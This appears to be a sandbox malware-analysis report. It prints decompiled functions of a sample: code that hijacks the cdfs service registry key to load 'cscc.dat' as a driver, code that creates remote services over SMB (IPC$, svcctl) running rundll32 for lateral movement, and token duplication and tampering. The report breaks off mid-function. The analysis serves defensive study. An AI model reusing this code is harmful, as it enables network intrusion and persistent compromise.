                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Alloc$Free$Sleep$htonsmemcpy$memsetrandrecvsend
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 2208892845-3175316637
                                                                                                                                                                                        • Opcode ID: 2b61d3a5ed11e8b6ba1376f64016b1f15a2a0ba0927e248da72e0f9f63f90336
                                                                                                                                                                                        • Instruction ID: c6abd47c14af7fae881c890f4bb1c35bc0688828dc3b18830f2c8d3eb8a4010c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b61d3a5ed11e8b6ba1376f64016b1f15a2a0ba0927e248da72e0f9f63f90336
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BD15BB0100344AFDB20DF69C884BAABBF5FF48304F158599F989DB292E779D845CB64
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B13E8() {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                        				int _v24;
                                                                                                                                                                                        				short _v544;
                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                                        				short* _t49;
                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				wsprintfW( &_v544, L"SYSTEM\\CurrentControlSet\\services\\%ws", L"cdfs");
                                                                                                                                                                                        				if(RegOpenKeyExW(0x80000002,  &_v544, 0, 0xf003f,  &_v8) == 0) {
                                                                                                                                                                                        					_t54 = 4;
                                                                                                                                                                                        					_t49 = L"Start";
                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                        					_v24 = _t54;
                                                                                                                                                                                        					if(RegQueryValueExW(_v8, _t49, 0, 0,  &_v12,  &_v24) == 0 && _v12 == _t54) {
                                                                                                                                                                                        						_v12 = 0;
                                                                                                                                                                                        						if(RegSetValueExW(_v8, _t49, 0, _t54,  &_v12, _t54) == 0 && RegSetValueExW(_v8, _t49, 0, 4,  &_v12, 4) == 0 && RegSetValueExW(_v8, L"Group", 0, 1, L"Filter", 0xe) == 0 && RegSetValueExW(_v8, L"DependOnService", 0, 7, L"FltMgr", 0xe) == 0) {
                                                                                                                                                                                        							_v20 = 3;
                                                                                                                                                                                        							if(RegSetValueExW(_v8, L"ErrorControl", 0, 4,  &_v20, 4) == 0) {
                                                                                                                                                                                        								_t45 = RegSetValueExW(_v8, L"ImagePath", 0, 2, L"cscc.dat", 0x12);
                                                                                                                                                                                        								if(_t45 == 0) {
                                                                                                                                                                                        									do {
                                                                                                                                                                                        										_t47 =  *(L"cdfs" + _t45) & 0x0000ffff;
                                                                                                                                                                                        										 *(L"cscc" + _t45) = _t47;
                                                                                                                                                                                        										_t45 = _t45 + 2;
                                                                                                                                                                                        									} while (_t47 != 0);
                                                                                                                                                                                        									_v16 = 1;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					RegCloseKey(_v8);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v16;
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B1408
                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 007B1427
                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Start,00000000,00000000,?,?,?,00000000), ref: 007B1453
                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 007B147E
                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 007B1495
                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,Group,00000000,00000001,Filter,0000000E,?,00000000), ref: 007B14B3
                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,DependOnService,00000000,00000007,FltMgr,0000000E,?,00000000), ref: 007B14CB
                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,ErrorControl,00000000,00000004,?,00000004,?,00000000), ref: 007B14E9
                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,ImagePath,00000000,00000002,cscc.dat,00000012,?,00000000), ref: 007B1501
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007B1523
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Value$CloseOpenQuerywsprintf
                                                                                                                                                                                        • String ID: DependOnService$ErrorControl$Filter$FltMgr$Group$ImagePath$SYSTEM\CurrentControlSet\services\%ws$Start$cdfs$cscc$cscc.dat
                                                                                                                                                                                        • API String ID: 693892761-175094307
                                                                                                                                                                                        • Opcode ID: dfc4a3210a2819465a378a90b06cdabf76f30579188a4793e938665953a1f786
                                                                                                                                                                                        • Instruction ID: d52ed94ac5c9b95ed6890d98b16a84d2d34e3ce5cfb93764db56f50bc8fc0026
                                                                                                                                                                                        • Opcode Fuzzy Hash: dfc4a3210a2819465a378a90b06cdabf76f30579188a4793e938665953a1f786
                                                                                                                                                                                        • Instruction Fuzzy Hash: E63152B1A4121DFAEB209B918D49FEFBB7CEF54B44F500099B601F1090E3789F119AE5
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                        			E007B516B(void* __ecx, intOrPtr _a4, char _a8, signed int _a12, signed char _a15, signed int _a16, intOrPtr _a20) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				char* _v20;
                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                        				signed int _t82;
                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                        				intOrPtr* _t91;
                                                                                                                                                                                        				intOrPtr* _t104;
                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                                        				signed int _t113;
                                                                                                                                                                                        				intOrPtr _t115;
                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                        				intOrPtr _t118;
                                                                                                                                                                                        				intOrPtr* _t122;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t126 = _a4;
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				if(E007B1EB9(_a4,  &_a8, _a12, "IPC$") != 0) {
                                                                                                                                                                                        					_v12 = _v12 & 0x00000000;
                                                                                                                                                                                        					if(E007B2054(_t126, _a8,  &_v12, "svcctl", 1) != 0 && E007B4E60(_t126, _a8, _v12) != 0) {
                                                                                                                                                                                        						_t72 = HeapAlloc(GetProcessHeap(), 8, 0x14);
                                                                                                                                                                                        						_v16 = _t72;
                                                                                                                                                                                        						if(_t72 != 0) {
                                                                                                                                                                                        							if(E007B4F43(_v12, _t126, _a8,  &_v16) != 0) {
                                                                                                                                                                                        								_t79 = HeapAlloc(GetProcessHeap(), 8, 0x20);
                                                                                                                                                                                        								_v20 = _t79;
                                                                                                                                                                                        								if(_t79 != 0) {
                                                                                                                                                                                        									_t80 = rand();
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									_push(_t80 % 0xf4240);
                                                                                                                                                                                        									_t82 = rand();
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									_t112 = 0xa;
                                                                                                                                                                                        									_push(_t82 % _t112);
                                                                                                                                                                                        									_t84 = rand();
                                                                                                                                                                                        									_t113 = 0xa;
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									_push(_t84 % _t113);
                                                                                                                                                                                        									sprintf(_v20, "clr_optimization_v%d.%d.%d");
                                                                                                                                                                                        									_t109 = HeapAlloc(GetProcessHeap(), 8, 0x208);
                                                                                                                                                                                        									if(_t109 != 0) {
                                                                                                                                                                                        										_t122 = _a16;
                                                                                                                                                                                        										_t91 = _t122;
                                                                                                                                                                                        										_a15 = 0;
                                                                                                                                                                                        										_a16 = _t91 + 1;
                                                                                                                                                                                        										do {
                                                                                                                                                                                        											_t115 =  *_t91;
                                                                                                                                                                                        											_t91 = _t91 + 1;
                                                                                                                                                                                        										} while (_t115 != 0);
                                                                                                                                                                                        										if(_t91 != _a16) {
                                                                                                                                                                                        											_t116 = 0;
                                                                                                                                                                                        											do {
                                                                                                                                                                                        												_a15 = _a15 + 1;
                                                                                                                                                                                        												 *((char*)(_t109 + _t116)) =  *((intOrPtr*)(_t116 + _t122));
                                                                                                                                                                                        												_t104 = _t122;
                                                                                                                                                                                        												_a16 = _t104 + 1;
                                                                                                                                                                                        												do {
                                                                                                                                                                                        													_t118 =  *_t104;
                                                                                                                                                                                        													_t104 = _t104 + 1;
                                                                                                                                                                                        												} while (_t118 != 0);
                                                                                                                                                                                        												_t116 = _a15 & 0x000000ff;
                                                                                                                                                                                        											} while (_t116 < _t104 - _a16);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										sprintf(_t109, "rundll32 %s,#2 %s", _a20, _t122);
                                                                                                                                                                                        										_a16 = _a16 & 0x00000000;
                                                                                                                                                                                        										_a12 = _a12 & 0x00000000;
                                                                                                                                                                                        										if(E007B4B5D(_v20, _v16, _t109,  &_a16,  &_a12) != 0 && E007B501E(_t115, _a4, _a8, _v12, _a16, _a12,  &_v16) != 0 && E007B50A2(_t115, _a4, _a8, _v12, _v16) != 0) {
                                                                                                                                                                                        											_v5 = 1;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										HeapFree(GetProcessHeap(), 8, _t109);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									HeapFree(GetProcessHeap(), 8, _v20);
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}






















                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 007B1EB9: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,007B943A), ref: 007B1ED2
                                                                                                                                                                                          • Part of subcall function 007B1EB9: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,007B943A), ref: 007B1EDB
                                                                                                                                                                                          • Part of subcall function 007B1EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,007B943A), ref: 007B1F1F
                                                                                                                                                                                          • Part of subcall function 007B1EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B1F22
                                                                                                                                                                                          • Part of subcall function 007B1EB9: htons.WS2_32(?), ref: 007B1F41
                                                                                                                                                                                          • Part of subcall function 007B2054: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,007B943A), ref: 007B206D
                                                                                                                                                                                          • Part of subcall function 007B2054: HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B2076
                                                                                                                                                                                          • Part of subcall function 007B2054: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,007B943A), ref: 007B209C
                                                                                                                                                                                          • Part of subcall function 007B2054: HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B209F
                                                                                                                                                                                          • Part of subcall function 007B2054: htons.WS2_32(?), ref: 007B20BC
                                                                                                                                                                                          • Part of subcall function 007B2054: send.WS2_32(?,00000000,?,00000000), ref: 007B2131
                                                                                                                                                                                          • Part of subcall function 007B2054: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 007B2148
                                                                                                                                                                                          • Part of subcall function 007B2054: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,007B943A), ref: 007B2168
                                                                                                                                                                                          • Part of subcall function 007B2054: HeapFree.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B216F
                                                                                                                                                                                          • Part of subcall function 007B4E60: GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 007B4E76
                                                                                                                                                                                          • Part of subcall function 007B4E60: HeapAlloc.KERNEL32(00000000), ref: 007B4E79
                                                                                                                                                                                          • Part of subcall function 007B4E60: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B4F2A
                                                                                                                                                                                          • Part of subcall function 007B4E60: HeapFree.KERNEL32(00000000), ref: 007B4F2D
                                                                                                                                                                                          • Part of subcall function 007B4E60: GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 007B4F32
                                                                                                                                                                                          • Part of subcall function 007B4E60: HeapFree.KERNEL32(00000000), ref: 007B4F35
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 007B51D3
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B51DC
                                                                                                                                                                                          • Part of subcall function 007B4F43: GetProcessHeap.KERNEL32(00000008,00000068,74654F20,?,77D74620,?,007B51F9,?,?,?), ref: 007B4F56
                                                                                                                                                                                          • Part of subcall function 007B4F43: HeapAlloc.KERNEL32(00000000,?,007B51F9,?,?,?), ref: 007B4F5D
                                                                                                                                                                                          • Part of subcall function 007B4F43: rand.MSVCRT ref: 007B4F86
                                                                                                                                                                                          • Part of subcall function 007B4F43: GetProcessHeap.KERNEL32(00000008,?,007B51F9,?,00000000,?,007B51F9,007B51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 007B4FF7
                                                                                                                                                                                          • Part of subcall function 007B4F43: HeapFree.KERNEL32(00000000), ref: 007B4FFE
                                                                                                                                                                                          • Part of subcall function 007B4F43: GetProcessHeap.KERNEL32(00000008,00000000,007B51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,007B51F9,?,?,?), ref: 007B5007
                                                                                                                                                                                          • Part of subcall function 007B4F43: HeapFree.KERNEL32(00000000,?,007B51F9,?,?,?), ref: 007B500E
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 007B5205
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B5208
                                                                                                                                                                                        • rand.MSVCRT ref: 007B521B
                                                                                                                                                                                        • rand.MSVCRT ref: 007B5226
                                                                                                                                                                                        • rand.MSVCRT ref: 007B522F
                                                                                                                                                                                        • sprintf.MSVCRT ref: 007B5246
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,007B943A), ref: 007B5252
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,007B943A), ref: 007B5255
                                                                                                                                                                                        • sprintf.MSVCRT ref: 007B52AB
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 007B5308
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B530B
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B943A), ref: 007B5316
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,007B943A), ref: 007B5319
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 007B5324
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B5327
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFree$rand$htonssprintf$Allocaterecvsend
                                                                                                                                                                                        • String ID: Uet0Xet$IPC$$clr_optimization_v%d.%d.%d$rundll32 %s,#2 %s$svcctl
                                                                                                                                                                                        • API String ID: 1531986241-3748780712
                                                                                                                                                                                        • Opcode ID: 23d262dcc1ef4fce0a48f8f6508f3df0588f7ec3f29b00a1b8fd443a5b3e5f82
                                                                                                                                                                                        • Instruction ID: 188c9c01527609c878b5bed92cccd12ba165428f8848045cc8485e4dd2a983ab
                                                                                                                                                                                        • Opcode Fuzzy Hash: 23d262dcc1ef4fce0a48f8f6508f3df0588f7ec3f29b00a1b8fd443a5b3e5f82
                                                                                                                                                                                        • Instruction Fuzzy Hash: E4518EB1900249BBDF119FA4CC45FEE7BA9EF49304F048055FA44A7292DBBAD915CB60
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 97%
                                                                                                                                                                                        			E007B85FB(void* __eflags, long _a4, void _a8, void* _a12, long _a16, void _a20, int _a24, intOrPtr _a36, void* _a88, char _a92, long _a96, char _a648, int _a656, void _a660) {
                                                                                                                                                                                        				void* _v0;
                                                                                                                                                                                        				void* _v4;
                                                                                                                                                                                        				void _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                        				signed int _t85;
                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                        				intOrPtr _t103;
                                                                                                                                                                                        				signed int _t107;
                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                        
                                                                                                                                                                                        				E007BA760(0x1294);
                                                                                                                                                                                        				_a8 = 0;
                                                                                                                                                                                        				_a24 = 0;
                                                                                                                                                                                        				_a656 = 0;
                                                                                                                                                                                        				memset( &_a660, 0, 0xffc);
                                                                                                                                                                                        				_t109 = (_t107 & 0xfffffff8) + 0xc;
                                                                                                                                                                                        				_v0 = 0;
                                                                                                                                                                                        				_a36 = E007B8147();
                                                                                                                                                                                        				_t62 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                        				_a16 = _t62;
                                                                                                                                                                                        				if(_t62 == 0xffffffff) {
                                                                                                                                                                                        					L21:
                                                                                                                                                                                        					return _a4;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_push( &_a92);
                                                                                                                                                                                        				_a92 = 0x22c;
                                                                                                                                                                                        				if(Process32FirstW(_t62) == 0) {
                                                                                                                                                                                        					GetLastError();
                                                                                                                                                                                        					L20:
                                                                                                                                                                                        					CloseHandle(_a12);
                                                                                                                                                                                        					goto L21;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_a24 = _a4 -  &_a648;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_a8 = _a8 | 0xffffffff;
                                                                                                                                                                                        					_v4 = 0;
                                                                                                                                                                                        					_a4 = 0;
                                                                                                                                                                                        					_t69 = OpenProcess(0x450, 0, _a96);
                                                                                                                                                                                        					_a20 = _t69;
                                                                                                                                                                                        					if(_t69 == 0) {
                                                                                                                                                                                        						L16:
                                                                                                                                                                                        						if(_v0 >= 0x40) {
                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(OpenProcessToken(_t69, 0x2000000,  &_v4) == 0 || GetTokenInformation(_v4, 0xc,  &_a8, 4,  &_a16) == 0 || _a24 != 0 && _a4 == 0 || DuplicateTokenEx(_v8, 0x2000000, 0, 2, 2,  &_v0) == 0) {
                                                                                                                                                                                        						L15:
                                                                                                                                                                                        						CloseHandle(_v4);
                                                                                                                                                                                        						CloseHandle(_a20);
                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						memset( &_a20, 0, 0x38);
                                                                                                                                                                                        						_t109 = _t109 + 0xc;
                                                                                                                                                                                        						if(GetTokenInformation(_v8, 0xa,  &_a20, 0x38,  &_a4) == 0) {
                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t103 = _a24;
                                                                                                                                                                                        						_t85 = 0;
                                                                                                                                                                                        						if(_v24 <= 0) {
                                                                                                                                                                                        							L13:
                                                                                                                                                                                        							if(SetTokenInformation(_v12, 0xc,  &_v8, 4) != 0) {
                                                                                                                                                                                        								_t89 = _v28 << 2;
                                                                                                                                                                                        								_v20 = _v20 + 1;
                                                                                                                                                                                        								_v28 = _v28 + 1;
                                                                                                                                                                                        								 *((intOrPtr*)(_t109 + _a4 + _t89 + 0x2a0)) = _v16;
                                                                                                                                                                                        								 *((intOrPtr*)(_t109 + _t89 + 0x2a0)) = _t103;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						while( *((intOrPtr*)(_t109 + 0x2a0 + _t85 * 4)) != _t103) {
                                                                                                                                                                                        							_t85 = _t85 + 1;
                                                                                                                                                                                        							if(_t85 < _v24) {
                                                                                                                                                                                        								continue;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L17:
                                                                                                                                                                                        				} while (Process32NextW(_a12,  &_a88) != 0);
                                                                                                                                                                                        				goto L20;
                                                                                                                                                                                        			}



















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 007B862D
                                                                                                                                                                                          • Part of subcall function 007B8147: memset.MSVCRT ref: 007B8160
                                                                                                                                                                                          • Part of subcall function 007B8147: GetVersionExW.KERNEL32(?,?,?,746543E0), ref: 007B8179
                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007B8645
                                                                                                                                                                                        • Process32FirstW.KERNEL32 ref: 007B8666
                                                                                                                                                                                        • OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 007B86A0
                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 007B86B9
                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(000000FF,0000000C(TokenIntegrityLevel),?,00000004,?), ref: 007B86DF
                                                                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 007B8708
                                                                                                                                                                                        • memset.MSVCRT ref: 007B871E
                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),?,00000038,?,?,00000000,?), ref: 007B8738
                                                                                                                                                                                        • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 007B8767
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B87A2
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B87A8
                                                                                                                                                                                        • Process32NextW.KERNEL32(?,?), ref: 007B87BA
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007B87CA
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B87D4
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Token$CloseHandleInformationmemset$OpenProcessProcess32$CreateDuplicateErrorFirstLastNextSnapshotToolhelp32Version
                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                        • API String ID: 4137997400-2766056989
                                                                                                                                                                                        • Opcode ID: 5ad4bb6ea0d1bcd3d581b9cdfbf7e636038483307bb9473ca133824891ae0e85
                                                                                                                                                                                        • Instruction ID: b7b3c037973d03566775d18ff34cba47e0b4a4126a0dcafac7a145a07fdb7abd
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ad4bb6ea0d1bcd3d581b9cdfbf7e636038483307bb9473ca133824891ae0e85
                                                                                                                                                                                        • Instruction Fuzzy Hash: A85126B1508305AFD320AF65D848FABBBECFB88758F144A29F594D21A0EB34C905CB57
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                        			E007B41E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, signed short _a12, intOrPtr* _a16) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                        				void _v36;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				signed int _t178;
                                                                                                                                                                                        				intOrPtr _t182;
                                                                                                                                                                                        				void* _t190;
                                                                                                                                                                                        				int _t193;
                                                                                                                                                                                        				void* _t196;
                                                                                                                                                                                        				intOrPtr _t211;
                                                                                                                                                                                        				intOrPtr _t212;
                                                                                                                                                                                        				intOrPtr _t214;
                                                                                                                                                                                        				intOrPtr _t215;
                                                                                                                                                                                        				intOrPtr _t218;
                                                                                                                                                                                        				intOrPtr _t219;
                                                                                                                                                                                        				intOrPtr _t220;
                                                                                                                                                                                        				void* _t227;
                                                                                                                                                                                        				void _t231;
                                                                                                                                                                                        				intOrPtr _t234;
                                                                                                                                                                                        				intOrPtr _t235;
                                                                                                                                                                                        				intOrPtr _t238;
                                                                                                                                                                                        				intOrPtr _t240;
                                                                                                                                                                                        				intOrPtr _t241;
                                                                                                                                                                                        				intOrPtr _t243;
                                                                                                                                                                                        				intOrPtr _t244;
                                                                                                                                                                                        				intOrPtr _t245;
                                                                                                                                                                                        				void* _t247;
                                                                                                                                                                                        				signed short _t249;
                                                                                                                                                                                        				signed int _t251;
                                                                                                                                                                                        				intOrPtr _t254;
                                                                                                                                                                                        				signed int _t255;
                                                                                                                                                                                        				signed short _t257;
                                                                                                                                                                                        				void* _t258;
                                                                                                                                                                                        				void* _t261;
                                                                                                                                                                                        				void* _t262;
                                                                                                                                                                                        				void* _t264;
                                                                                                                                                                                        				void* _t265;
                                                                                                                                                                                        				void* _t266;
                                                                                                                                                                                        				void* _t268;
                                                                                                                                                                                        				intOrPtr* _t277;
                                                                                                                                                                                        				void* _t278;
                                                                                                                                                                                        				intOrPtr* _t279;
                                                                                                                                                                                        				void* _t303;
                                                                                                                                                                                        				signed short _t305;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t268 = __edx;
                                                                                                                                                                                        				_t247 = __ecx;
                                                                                                                                                                                        				_v5 = 0;
